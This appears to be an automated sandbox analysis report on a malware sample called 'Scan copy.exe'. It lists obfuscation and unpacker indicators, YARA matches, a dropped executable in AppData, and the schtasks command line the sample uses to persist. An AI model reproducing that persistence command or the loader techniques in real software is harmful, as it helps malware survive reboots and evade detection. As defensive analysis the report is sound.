Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Scan copy.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.Scan copy.exe.51b0000.3.raw.unpack, kAOj1Y7pfP90kycNNw.cs

.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

.NET source code contains potential unpacker

Source: 0.2.Scan copy.exe.3907488.0.raw.unpack, AgyBZslxuiICoVYBCt.cs	.Net Code: tx5H7ymxLV System.Reflection.Assembly.Load(byte[])
Source: 0.2.Scan copy.exe.6c90000.4.raw.unpack, AgyBZslxuiICoVYBCt.cs	.Net Code: tx5H7ymxLV System.Reflection.Assembly.Load(byte[])
Source: 0.2.Scan copy.exe.51b0000.3.raw.unpack, GtaAIbrHXObmMm8GPA.cs	.Net Code: vaH8QmOOp System.Reflection.Assembly.Load(byte[])

Yara detected aPLib compressed binary

Source: Yara match	File source: 13.2.vLQwEscoQr.exe.41ec8d8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Scan copy.exe.38ea318.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Scan copy.exe.3787008.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Scan copy.exe.38ea318.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.vLQwEscoQr.exe.41ec8d8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.vLQwEscoQr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Scan copy.exe.3787008.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.vLQwEscoQr.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.1349197603.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1291320333.000000000277C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1347693310.0000000003024000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1291953890.00000000038EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1291953890.0000000003722000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Scan copy.exe PID: 5420, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vLQwEscoQr.exe PID: 7512, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vLQwEscoQr.exe PID: 8048, type: MEMORYSTR

Source: C:\Users\user\Desktop\Scan copy.exe	Code function: 0_2_06C8866F push ecx; iretd	0_2_06C88672
Source: C:\Users\user\Desktop\Scan copy.exe	Code function: 0_2_06C88673 push eax; iretd	0_2_06C8867A
Source: C:\Users\user\Desktop\Scan copy.exe	Code function: 0_2_06C8B631 pushfd ; iretd	0_2_06C8B63D
Source: C:\Users\user\Desktop\Scan copy.exe	Code function: 0_2_06C8A79D pushad ; iretd	0_2_06C8A76A
Source: C:\Users\user\Desktop\Scan copy.exe	Code function: 0_2_06C8A760 pushad ; iretd	0_2_06C8A762
Source: C:\Users\user\Desktop\Scan copy.exe	Code function: 0_2_06C8A763 pushad ; iretd	0_2_06C8A76A
Source: C:\Users\user\Desktop\Scan copy.exe	Code function: 0_2_06C8F773 pushfd ; iretd	0_2_06C8F776
Source: C:\Users\user\Desktop\Scan copy.exe	Code function: 0_2_06C8F733 pushfd ; iretd	0_2_06C8F772
Source: C:\Users\user\Desktop\Scan copy.exe	Code function: 0_2_06C894B0 push esi; iretd	0_2_06C894BA
Source: C:\Users\user\Desktop\Scan copy.exe	Code function: 0_2_06C88411 push eax; iretd	0_2_06C88412
Source: C:\Users\user\Desktop\Scan copy.exe	Code function: 0_2_06C8B2CB pushad ; iretd	0_2_06C8B2CD
Source: C:\Users\user\Desktop\Scan copy.exe	Code function: 0_2_06C892D1 push esi; iretd	0_2_06C892D2
Source: C:\Users\user\Desktop\Scan copy.exe	Code function: 0_2_06C892D3 push esi; iretd	0_2_06C892DA
Source: C:\Users\user\Desktop\Scan copy.exe	Code function: 0_2_06C8B280 pushfd ; iretw	0_2_06C8B281
Source: C:\Users\user\Desktop\Scan copy.exe	Code function: 0_2_06C89279 push esi; iretd	0_2_06C8927A
Source: C:\Users\user\Desktop\Scan copy.exe	Code function: 0_2_06C89229 push esi; iretd	0_2_06C8922A
Source: C:\Users\user\Desktop\Scan copy.exe	Code function: 0_2_06C8B238 push esp; iretw	0_2_06C8B239
Source: C:\Users\user\Desktop\Scan copy.exe	Code function: 0_2_06C893E1 push esi; iretd	0_2_06C893E2
Source: C:\Users\user\Desktop\Scan copy.exe	Code function: 0_2_06C890FC push ebp; iretd	0_2_06C89102
Source: C:\Users\user\Desktop\Scan copy.exe	Code function: 0_2_06C8B020 pushfd ; iretd	0_2_06C8B021
Source: C:\Users\user\Desktop\Scan copy.exe	Code function: 0_2_06C8B023 push esp; iretd	0_2_06C8B029
Source: C:\Users\user\Desktop\Scan copy.exe	Code function: 0_2_06C85180 push esp; iretd	0_2_06C85181
Source: C:\Users\user\Desktop\Scan copy.exe	Code function: 0_2_06C88EE0 push esp; iretd	0_2_06C88EE2
Source: C:\Users\user\Desktop\Scan copy.exe	Code function: 0_2_06C8BE83 push es; iretd	0_2_06C8BE8C
Source: C:\Users\user\Desktop\Scan copy.exe	Code function: 0_2_06C82EAB push ss; iretd	0_2_06C82EB2
Source: C:\Users\user\Desktop\Scan copy.exe	Code function: 0_2_06C82E78 push ss; iretd	0_2_06C82E7A
Source: C:\Users\user\Desktop\Scan copy.exe	Code function: 0_2_06C82E7B push ss; iretd	0_2_06C82E82
Source: C:\Users\user\Desktop\Scan copy.exe	Code function: 0_2_06C88FD5 push ebp; iretd	0_2_06C88FD6
Source: C:\Users\user\Desktop\Scan copy.exe	Code function: 0_2_06C8AF9B push esp; iretd	0_2_06C8AFA5
Source: C:\Users\user\Desktop\Scan copy.exe	Code function: 0_2_06C8AC53 pushad ; iretd	0_2_06C8AC5A
Source: C:\Users\user\Desktop\Scan copy.exe	Code function: 0_2_06C85DB0 pushfd ; iretd	0_2_06C85DB1

Source: Scan copy.exe	Static PE information: section name: .text entropy: 7.783011599815193
Source: vLQwEscoQr.exe.0.dr	Static PE information: section name: .text entropy: 7.783011599815193

Source: 0.2.Scan copy.exe.3907488.0.raw.unpack, GRPYfmOB3y0jip2cyW.cs	High entropy of concatenated method names: 'fyQk5Xndub', 'LbNk4oky8i', 'JLKk7Zrp0J', 'XnRkLXBEmt', 'Kw6kMkKqxL', 'cOgkCWa4BA', 'ILMkU0YwDT', 'FNVkKluVJj', 'YRZlqoT9kvQ2B5XRP6N', 'Aee5m1TBxTt6uIDHlsp'
Source: 0.2.Scan copy.exe.3907488.0.raw.unpack, uFXK8DKWONX2irnLwF.cs	High entropy of concatenated method names: 'rNGWGF6uXP', 'zrwWCNeqA9', 'wagEjFNNLv', 'QAhEOd9jp0', 'eOnExH6Hh8', 'Y1AEgTQbME', 'yXwEX0pbKv', 'WhyE9g1Rps', 'siVEnvTJad', 'KxVEsOn1P5'
Source: 0.2.Scan copy.exe.3907488.0.raw.unpack, Lcxc7GHkibRcYMJMOV.cs	High entropy of concatenated method names: 'sPCY8h3eTB', 'cYCYlrXmN2', 'mjVYv4vH60', 'r5ZYmquFXK', 'pnLYtwFgTV', 'rRmYqmHL73', 'gETfMgtFRMXcGhBtef', 'SIGSA26wYXfbG4WTg0', 'er4YY7L3CE', 'C0XYhOM6xR'
Source: 0.2.Scan copy.exe.3907488.0.raw.unpack, IJshKay7CF0iOgidJ3.cs	High entropy of concatenated method names: 'Tek6EIJIJV', 'fi56WUmeKx', 'tnR6keZohl', 'UGD68AaWuA', 'PkS6VhDWwq', 'F9t6lESYiv', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Scan copy.exe.3907488.0.raw.unpack, alKptdejBDeEOpP6Dm.cs	High entropy of concatenated method names: 'FfHrvv6Pl4', 'ujbrmfWkKh', 'ToString', 'jjnrfy1E9Q', 'gxur0Zo2w8', 'w2grEehfeI', 'm7yrWC6vXf', 'kXIrk720xY', 'JMLr8SNSjg', 'vYbrlnB8hl'
Source: 0.2.Scan copy.exe.3907488.0.raw.unpack, ChwRleZEVkmEtJMsRE.cs	High entropy of concatenated method names: 'EGCVSLlQAc', 'hySVIDt2xR', 'VrdVjtuwcM', 'UgaVONrc1D', 'yujVxd0HNr', 'fwaVgDQjFr', 'tTkVXys0AU', 'nIXV970pE4', 'GMZVn5kYG2', 'xBPVsmm03N'
Source: 0.2.Scan copy.exe.3907488.0.raw.unpack, tdSmWvUjV4vH60w5Zq.cs	High entropy of concatenated method names: 'aHaELiP1LL', 'WuSEMmxIqn', 'A4HEblxf1i', 'VlDEUI6hKm', 'Jy6Ettpsqd', 'QotEq1mnRu', 'X3iErRCTKa', 'lANEw5EoTY', 'kUPEVC0OaW', 'lsfE6fsKH5'
Source: 0.2.Scan copy.exe.3907488.0.raw.unpack, bfr1t8E2DJXBZtdeYP.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'OwmNZMtqHa', 'XboNyv3I6H', 'tamNzmPED0', 'mvXh1jTr4y', 'z1bhY2VkiY', 'QSIhNa1b28', 'C25hhTd04U', 'oIsGF5Ilg56b53rKnk0'
Source: 0.2.Scan copy.exe.3907488.0.raw.unpack, FuOuOrYHqXEoXFL81Gv.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'TJ8uVoan1T', 'F9vu6gC8bo', 'Fgfuc9hyc9', 'vseuu277Kd', 'CFAuBc1ghG', 'xR0u39MIAR', 'ETHu5awGHk'
Source: 0.2.Scan copy.exe.3907488.0.raw.unpack, SD7ablal7P4l4hOWbA.cs	High entropy of concatenated method names: 'yxHrQujFhw', 'QKury8gAhA', 'xs2w1v9P4T', 'qMEwYmrVcW', 'QQIrAu1mCA', 'cvrrPj1FDd', 'oPIropq3pf', 'XQ5rDJQ60k', 'dpXr2dDjtJ', 's4NrdxwJbq'
Source: 0.2.Scan copy.exe.3907488.0.raw.unpack, W1UFvWNspZ6HiF5PCR.cs	High entropy of concatenated method names: 'SqK7WhmHK', 'a9PLyPkc3', 'DinMwSehT', 'fsfC48oR4', 'm3iUa2eWf', 'KfdKiEt1W', 'aJ7bLqws7msfcFCpAo', 'l0qIGnNP1H7RooN6Mq', 'JHTwyXthI', 'uEH62jGry'
Source: 0.2.Scan copy.exe.3907488.0.raw.unpack, WLmKhYDRClOGs5RM8j.cs	High entropy of concatenated method names: 'd49tsFfH2n', 'bHhtPmA2Ka', 'FBotDZpOJs', 'Edmt2707Lv', 'snMtI5jmRc', 'e2OtjQfQYp', 'zxitO9klFX', 'fMbtxCWlIR', 'zuftg8Iv2s', 'rZQtXD84G6'
Source: 0.2.Scan copy.exe.3907488.0.raw.unpack, AgyBZslxuiICoVYBCt.cs	High entropy of concatenated method names: 'St8hp7F7lM', 'VcShfNkTtO', 'SkXh0tLPVb', 'In8hEArWDx', 'I3ahW6rNlL', 'PTahkfjO9D', 'CkCh8BX733', 'UsvhlxhvrN', 'f68hiP7AgD', 'fCHhv5X7Ks'
Source: 0.2.Scan copy.exe.3907488.0.raw.unpack, H1s3JrYYfDfmD9ntJgv.cs	High entropy of concatenated method names: 'FdO6yABV2W', 'o4n6zuBMEy', 'VFAc1TgomU', 'qKOcYoEvM8', 'UbLcNQmF6N', 'x0MchNG02A', 'eTecHR5fVp', 'PuLcp70wWb', 'ki1cfqrKVJ', 'aREc0fPeCQ'
Source: 0.2.Scan copy.exe.3907488.0.raw.unpack, Ch3eTBbNYCrXmN2i0X.cs	High entropy of concatenated method names: 'pVK0DivKbP', 'rbx02IXXX1', 'gib0dRdQtb', 'xFv0enLgT7', 'sh30Fxus7q', 'sKn0alMqPW', 'QiW0TeHwjg', 'DGQ0QxCoEk', 'neV0ZGeoWe', 'P0w0ymuYNf'
Source: 0.2.Scan copy.exe.3907488.0.raw.unpack, KTVwRmSmHL73fGetZE.cs	High entropy of concatenated method names: 'n4nkpxQvLJ', 'gwhk0efhPx', 'XvQkWoB5EQ', 'AN0k8CH9sR', 'IZaklCDwqk', 'K6rWFF8flq', 'TsiWadAQEQ', 'uqgWTcwwsT', 'mxRWQknBb9', 'IiSWZklhvx'
Source: 0.2.Scan copy.exe.3907488.0.raw.unpack, NXYGX6nBjRv1cwPefo.cs	High entropy of concatenated method names: 'T1P84XTcwI', 'oJm8JBFGjb', 'OC9870PLMM', 'shC8L9rXBu', 'ND48GZTkqq', 'RkI8M72HM2', 'CJJ8C9Nbvg', 'u1d8bdwCXq', 'zJ48UMXHqv', 'Dm08KuOplw'
Source: 0.2.Scan copy.exe.3907488.0.raw.unpack, bO8qZBdcbY6NmnIdri.cs	High entropy of concatenated method names: 'ToString', 'fMtqAXApHu', 'lp3qIwCQRH', 'l8JqjB3xHX', 'WZrqOWnT8H', 'ITtqx28rBt', 'I7Nqgx5Ld9', 'tXrqX3sr15', 'BQyq9eRZvo', 'crIqnxsvLJ'
Source: 0.2.Scan copy.exe.3907488.0.raw.unpack, RhEq28zeTKQX83oE1S.cs	High entropy of concatenated method names: 'pxF6MH2upc', 'BhT6bhyYev', 'Dmq6U6d1fj', 'P5U6SsHAcF', 'ePF6I7N2iE', 'UvF6Om109e', 'rio6xHd1R7', 'aXw65Hqlc0', 'F2k64qU4Mp', 'VGV6JjhK02'
Source: 0.2.Scan copy.exe.3907488.0.raw.unpack, pAnAPjTQUM53AE5qZc.cs	High entropy of concatenated method names: 'AYnVtotQC7', 'mbvVrZNaK7', 'fj3VVPxgXF', 'exvVcCFWrm', 'zOZVBw6RSo', 'mKRV5qmKjt', 'Dispose', 'lUbwfIRSMY', 'uOUw0kRPvk', 'DZLwEE9VKv'
Source: 0.2.Scan copy.exe.3907488.0.raw.unpack, R5jlAConUcCAuc98mi.cs	High entropy of concatenated method names: 'u26RbNyghA', 'LtKRUax1ei', 'XLSRSpjUsH', 'tjJRIxIWHA', 'uWkRObYWNL', 'zlERxnJxpD', 'tqYRXZZoBJ', 'IA6R9ew63b', 'cxlRsJqpUS', 'varRAYUwmy'
Source: 0.2.Scan copy.exe.3907488.0.raw.unpack, p0Y1AI0FRZi7o7UMfy.cs	High entropy of concatenated method names: 'Dispose', 'B53YZAE5qZ', 'U8HNIlEOab', 'yYeYQaX5JL', 'txUYyKBYhv', 'sGRYziYrJS', 'ProcessDialogKey', 'GJCN1hwRle', 'hVkNYmEtJM', 'ORENNOJshK'
Source: 0.2.Scan copy.exe.3907488.0.raw.unpack, q3gxyfIJhYjGiWM9ZP.cs	High entropy of concatenated method names: 'g90FQ5TvF3RhhJJ1SfA', 'EaA9iRTMocKqEWfcoZ1', 'f33kwqlPom', 'PJSkVZCUsQ', 'fCak6lYwy8', 'BpBHQFT7JTgtmuE2LFa', 'NXvqumTHuDolMOii0ke'
Source: 0.2.Scan copy.exe.6c90000.4.raw.unpack, GRPYfmOB3y0jip2cyW.cs	High entropy of concatenated method names: 'fyQk5Xndub', 'LbNk4oky8i', 'JLKk7Zrp0J', 'XnRkLXBEmt', 'Kw6kMkKqxL', 'cOgkCWa4BA', 'ILMkU0YwDT', 'FNVkKluVJj', 'YRZlqoT9kvQ2B5XRP6N', 'Aee5m1TBxTt6uIDHlsp'
Source: 0.2.Scan copy.exe.6c90000.4.raw.unpack, uFXK8DKWONX2irnLwF.cs	High entropy of concatenated method names: 'rNGWGF6uXP', 'zrwWCNeqA9', 'wagEjFNNLv', 'QAhEOd9jp0', 'eOnExH6Hh8', 'Y1AEgTQbME', 'yXwEX0pbKv', 'WhyE9g1Rps', 'siVEnvTJad', 'KxVEsOn1P5'
Source: 0.2.Scan copy.exe.6c90000.4.raw.unpack, Lcxc7GHkibRcYMJMOV.cs	High entropy of concatenated method names: 'sPCY8h3eTB', 'cYCYlrXmN2', 'mjVYv4vH60', 'r5ZYmquFXK', 'pnLYtwFgTV', 'rRmYqmHL73', 'gETfMgtFRMXcGhBtef', 'SIGSA26wYXfbG4WTg0', 'er4YY7L3CE', 'C0XYhOM6xR'
Source: 0.2.Scan copy.exe.6c90000.4.raw.unpack, IJshKay7CF0iOgidJ3.cs	High entropy of concatenated method names: 'Tek6EIJIJV', 'fi56WUmeKx', 'tnR6keZohl', 'UGD68AaWuA', 'PkS6VhDWwq', 'F9t6lESYiv', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Scan copy.exe.6c90000.4.raw.unpack, alKptdejBDeEOpP6Dm.cs	High entropy of concatenated method names: 'FfHrvv6Pl4', 'ujbrmfWkKh', 'ToString', 'jjnrfy1E9Q', 'gxur0Zo2w8', 'w2grEehfeI', 'm7yrWC6vXf', 'kXIrk720xY', 'JMLr8SNSjg', 'vYbrlnB8hl'
Source: 0.2.Scan copy.exe.6c90000.4.raw.unpack, ChwRleZEVkmEtJMsRE.cs	High entropy of concatenated method names: 'EGCVSLlQAc', 'hySVIDt2xR', 'VrdVjtuwcM', 'UgaVONrc1D', 'yujVxd0HNr', 'fwaVgDQjFr', 'tTkVXys0AU', 'nIXV970pE4', 'GMZVn5kYG2', 'xBPVsmm03N'
Source: 0.2.Scan copy.exe.6c90000.4.raw.unpack, tdSmWvUjV4vH60w5Zq.cs	High entropy of concatenated method names: 'aHaELiP1LL', 'WuSEMmxIqn', 'A4HEblxf1i', 'VlDEUI6hKm', 'Jy6Ettpsqd', 'QotEq1mnRu', 'X3iErRCTKa', 'lANEw5EoTY', 'kUPEVC0OaW', 'lsfE6fsKH5'
Source: 0.2.Scan copy.exe.6c90000.4.raw.unpack, bfr1t8E2DJXBZtdeYP.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'OwmNZMtqHa', 'XboNyv3I6H', 'tamNzmPED0', 'mvXh1jTr4y', 'z1bhY2VkiY', 'QSIhNa1b28', 'C25hhTd04U', 'oIsGF5Ilg56b53rKnk0'
Source: 0.2.Scan copy.exe.6c90000.4.raw.unpack, FuOuOrYHqXEoXFL81Gv.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'TJ8uVoan1T', 'F9vu6gC8bo', 'Fgfuc9hyc9', 'vseuu277Kd', 'CFAuBc1ghG', 'xR0u39MIAR', 'ETHu5awGHk'
Source: 0.2.Scan copy.exe.6c90000.4.raw.unpack, SD7ablal7P4l4hOWbA.cs	High entropy of concatenated method names: 'yxHrQujFhw', 'QKury8gAhA', 'xs2w1v9P4T', 'qMEwYmrVcW', 'QQIrAu1mCA', 'cvrrPj1FDd', 'oPIropq3pf', 'XQ5rDJQ60k', 'dpXr2dDjtJ', 's4NrdxwJbq'
Source: 0.2.Scan copy.exe.6c90000.4.raw.unpack, W1UFvWNspZ6HiF5PCR.cs	High entropy of concatenated method names: 'SqK7WhmHK', 'a9PLyPkc3', 'DinMwSehT', 'fsfC48oR4', 'm3iUa2eWf', 'KfdKiEt1W', 'aJ7bLqws7msfcFCpAo', 'l0qIGnNP1H7RooN6Mq', 'JHTwyXthI', 'uEH62jGry'
Source: 0.2.Scan copy.exe.6c90000.4.raw.unpack, WLmKhYDRClOGs5RM8j.cs	High entropy of concatenated method names: 'd49tsFfH2n', 'bHhtPmA2Ka', 'FBotDZpOJs', 'Edmt2707Lv', 'snMtI5jmRc', 'e2OtjQfQYp', 'zxitO9klFX', 'fMbtxCWlIR', 'zuftg8Iv2s', 'rZQtXD84G6'
Source: 0.2.Scan copy.exe.6c90000.4.raw.unpack, AgyBZslxuiICoVYBCt.cs	High entropy of concatenated method names: 'St8hp7F7lM', 'VcShfNkTtO', 'SkXh0tLPVb', 'In8hEArWDx', 'I3ahW6rNlL', 'PTahkfjO9D', 'CkCh8BX733', 'UsvhlxhvrN', 'f68hiP7AgD', 'fCHhv5X7Ks'
Source: 0.2.Scan copy.exe.6c90000.4.raw.unpack, H1s3JrYYfDfmD9ntJgv.cs	High entropy of concatenated method names: 'FdO6yABV2W', 'o4n6zuBMEy', 'VFAc1TgomU', 'qKOcYoEvM8', 'UbLcNQmF6N', 'x0MchNG02A', 'eTecHR5fVp', 'PuLcp70wWb', 'ki1cfqrKVJ', 'aREc0fPeCQ'
Source: 0.2.Scan copy.exe.6c90000.4.raw.unpack, Ch3eTBbNYCrXmN2i0X.cs	High entropy of concatenated method names: 'pVK0DivKbP', 'rbx02IXXX1', 'gib0dRdQtb', 'xFv0enLgT7', 'sh30Fxus7q', 'sKn0alMqPW', 'QiW0TeHwjg', 'DGQ0QxCoEk', 'neV0ZGeoWe', 'P0w0ymuYNf'
Source: 0.2.Scan copy.exe.6c90000.4.raw.unpack, KTVwRmSmHL73fGetZE.cs	High entropy of concatenated method names: 'n4nkpxQvLJ', 'gwhk0efhPx', 'XvQkWoB5EQ', 'AN0k8CH9sR', 'IZaklCDwqk', 'K6rWFF8flq', 'TsiWadAQEQ', 'uqgWTcwwsT', 'mxRWQknBb9', 'IiSWZklhvx'
Source: 0.2.Scan copy.exe.6c90000.4.raw.unpack, NXYGX6nBjRv1cwPefo.cs	High entropy of concatenated method names: 'T1P84XTcwI', 'oJm8JBFGjb', 'OC9870PLMM', 'shC8L9rXBu', 'ND48GZTkqq', 'RkI8M72HM2', 'CJJ8C9Nbvg', 'u1d8bdwCXq', 'zJ48UMXHqv', 'Dm08KuOplw'
Source: 0.2.Scan copy.exe.6c90000.4.raw.unpack, bO8qZBdcbY6NmnIdri.cs	High entropy of concatenated method names: 'ToString', 'fMtqAXApHu', 'lp3qIwCQRH', 'l8JqjB3xHX', 'WZrqOWnT8H', 'ITtqx28rBt', 'I7Nqgx5Ld9', 'tXrqX3sr15', 'BQyq9eRZvo', 'crIqnxsvLJ'
Source: 0.2.Scan copy.exe.6c90000.4.raw.unpack, RhEq28zeTKQX83oE1S.cs	High entropy of concatenated method names: 'pxF6MH2upc', 'BhT6bhyYev', 'Dmq6U6d1fj', 'P5U6SsHAcF', 'ePF6I7N2iE', 'UvF6Om109e', 'rio6xHd1R7', 'aXw65Hqlc0', 'F2k64qU4Mp', 'VGV6JjhK02'
Source: 0.2.Scan copy.exe.6c90000.4.raw.unpack, pAnAPjTQUM53AE5qZc.cs	High entropy of concatenated method names: 'AYnVtotQC7', 'mbvVrZNaK7', 'fj3VVPxgXF', 'exvVcCFWrm', 'zOZVBw6RSo', 'mKRV5qmKjt', 'Dispose', 'lUbwfIRSMY', 'uOUw0kRPvk', 'DZLwEE9VKv'
Source: 0.2.Scan copy.exe.6c90000.4.raw.unpack, R5jlAConUcCAuc98mi.cs	High entropy of concatenated method names: 'u26RbNyghA', 'LtKRUax1ei', 'XLSRSpjUsH', 'tjJRIxIWHA', 'uWkRObYWNL', 'zlERxnJxpD', 'tqYRXZZoBJ', 'IA6R9ew63b', 'cxlRsJqpUS', 'varRAYUwmy'
Source: 0.2.Scan copy.exe.6c90000.4.raw.unpack, p0Y1AI0FRZi7o7UMfy.cs	High entropy of concatenated method names: 'Dispose', 'B53YZAE5qZ', 'U8HNIlEOab', 'yYeYQaX5JL', 'txUYyKBYhv', 'sGRYziYrJS', 'ProcessDialogKey', 'GJCN1hwRle', 'hVkNYmEtJM', 'ORENNOJshK'
Source: 0.2.Scan copy.exe.6c90000.4.raw.unpack, q3gxyfIJhYjGiWM9ZP.cs	High entropy of concatenated method names: 'g90FQ5TvF3RhhJJ1SfA', 'EaA9iRTMocKqEWfcoZ1', 'f33kwqlPom', 'PJSkVZCUsQ', 'fCak6lYwy8', 'BpBHQFT7JTgtmuE2LFa', 'NXvqumTHuDolMOii0ke'
Source: 0.2.Scan copy.exe.51b0000.3.raw.unpack, FZaOUuOPvnEAfIAr0M.cs	High entropy of concatenated method names: 'lEA0fIAr0', 'tZCA8AZk9', 'gXO9bmMm8', 'DGw7NTeNK', 'Om2dkTqQy', 'EZYgaiyMO', 'Dispose', 'FZaOOUuPv', 'pv8tyvFJFxYXZkDera', 'y16QeXgcC0F7yngarN'
Source: 0.2.Scan copy.exe.51b0000.3.raw.unpack, GtaAIbrHXObmMm8GPA.cs	High entropy of concatenated method names: 't43wlqHDE', 'b331V9lSR', 'y0lQR8D9G', 'PPrmXmJxA', 'CF9acgM2i', 'eykiYV7wh', 'vSMVwpZMk', 'kxKJsuLoh', 'Ny8e5Nb61', 'qdOCMMDun'
Source: 0.2.Scan copy.exe.51b0000.3.raw.unpack, kAOj1Y7pfP90kycNNw.cs	High entropy of concatenated method names: 'lb2Ia3XrDtd392xi2Tb', 'XJIblTXQXnFqByJBCJm', 'uLEr9lUTy0', 'Y8R45UX8CExDEFrtuqs', 'ye0NJSX7mZWAZIVVpiG', 'WY1PxJXMKygj5Preg16', 'ELG2kXXJWTZduCJNQBl', 'RgtTUJcyZL', 'wUUrNltvEH', 'CJErdEKrT9'

Source: C:\Users\user\Desktop\Scan copy.exe

File created: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\Scan copy.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vLQwEscoQr" /XML "C:\Users\user\AppData\Local\Temp\tmp18EC.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
